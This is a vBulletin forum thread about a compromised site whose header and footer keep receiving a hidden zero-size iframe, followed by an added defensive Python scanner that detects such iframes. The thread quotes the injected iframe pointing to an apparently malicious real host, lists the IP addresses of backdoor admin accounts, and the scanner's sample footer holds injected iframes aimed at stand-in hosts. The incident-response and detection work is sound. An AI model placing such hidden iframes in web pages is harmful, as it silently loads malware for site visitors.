Header & footer malware inserted, default source vb 4.2.1.


  • Header & footer malware inserted, default source vb 4.2.1.

    I keep having problems with my header and footer having malware links inserted. I changed all passwords... forum, user, server, etc. and the templates are reset to default but the line keeps reappearing with the following redirect:

    PHP Code:
     <iframe src="http://ferrerautoparts.com/ini.php" width="0" height="0" frameborder="0"></iframe>
    I currently have my forum turned off and the footer was still compromised.

    I looked up the link and there are other vb forums showing complaints about it so I was wondering if this has been seen by anyone else in the VB group? I've also contacted the hosting company for ferrerautoparts.com to have the malware redirect link removed or the site shut down.

  • #2
    Install directory has been removed. Also ran Suspect File Versions and all seemed okay.



    • #3
      Make sure that you do not have any unwanted PLUGINS installed!
      Cu Respect / Best Regards / Mit freundlichen Grüßen

      roStyles Design LLC
      CEO & Founder (Design and Support)
      Romanian Translator
      Teascu Dorin
      https://www.rostyles.com



      • #4
        Found 3 additional admin accounts: adminasx, optima, aventus67. Blocked their IP addresses and banned the accounts. I'll monitor the site and see if the header or footer changes again.

        This issue with having to delete the install directory - was this exploit allowing someone to enter the admin section and create extra accounts?

        IP addresses of the 3 hacker accounts are as follows (in case anyone else has users matching these locations):
        adminasx:
        46.165.201.35
        173.214.169.158
        85.17.58.128

        Optima: 151.248.125.184

        Aventus67: 88.230.120.188



        • #5
          Yes, it was. Please raise a support ticket so we can have a look round and make sure everything is cleaned for you... Http://www.vbulletin.com/go/techsupport
          MARK.B | vBULLETIN SUPPORT

          TalkNewsUK - My vBulletin 5.5.4 Demo
          AdminAmmo - My Cloud Demo

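A defensive check for the symptom described in this thread, as an added example that is not part of any post or of vBulletin itself: it scans template HTML for iframes that are hidden (zero width or height, or hiding CSS) and load from a host outside an allowlist. The allowlist, the host names and the sample footer are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

# Assumption: hosts this forum legitimately embeds (constructed value).
ALLOWED_HOSTS = {"forum.example.org"}

# "0", "0px", "0%" count as zero; "0.5" or "100" do not.
ZERO = re.compile(r"^\s*0+(\.0+)?\s*(px|%)?\s*$", re.I)
HIDING_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden"
    r"|(?:width|height)\s*:\s*0+(?:px)?\s*(?:;|$)", re.I)

# Constructed sample footer template; only lines 3 and 6 should be flagged.
SAMPLE_FOOTER = """<div id="footer">
  <a href="http://forum.example.org/contact">Contact Us</a>
  <iframe src="http://injected.example/ini.php" width="0" height="0" frameborder="0"></iframe>
  <iframe src="http://forum.example.org/banner.html" width="0" height="0"></iframe>
  <iframe src="https://video.example/embed/1" width="560" height="315"></iframe>
  <IFRAME SRC="//injected.example/x" STYLE="display:none"></IFRAME>
</div>"""


class HiddenIframeFinder(HTMLParser):
    """Collects (line, host) for hidden iframes served from unlisted hosts."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":  # HTMLParser lowercases tag and attribute names
            return
        a = {k: (v or "") for k, v in attrs}
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        zero_size = any(ZERO.match(a[d]) for d in ("width", "height") if d in a)
        hidden = zero_size or bool(HIDING_STYLE.search(a.get("style", "")))
        if hidden and host and host not in ALLOWED_HOSTS:
            self.findings.append((self.getpos()[0], host))


def scan_template(html):
    finder = HiddenIframeFinder()
    finder.feed(html)
    finder.close()
    return finder.findings

if __name__ == "__main__":
    for line, host in scan_template(SAMPLE_FOOTER):
        print(f"line {line}: hidden iframe loading from {host}")
```

Run against exported header and footer templates on a schedule, a non-empty result means the injection has come back and the access path is still open.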
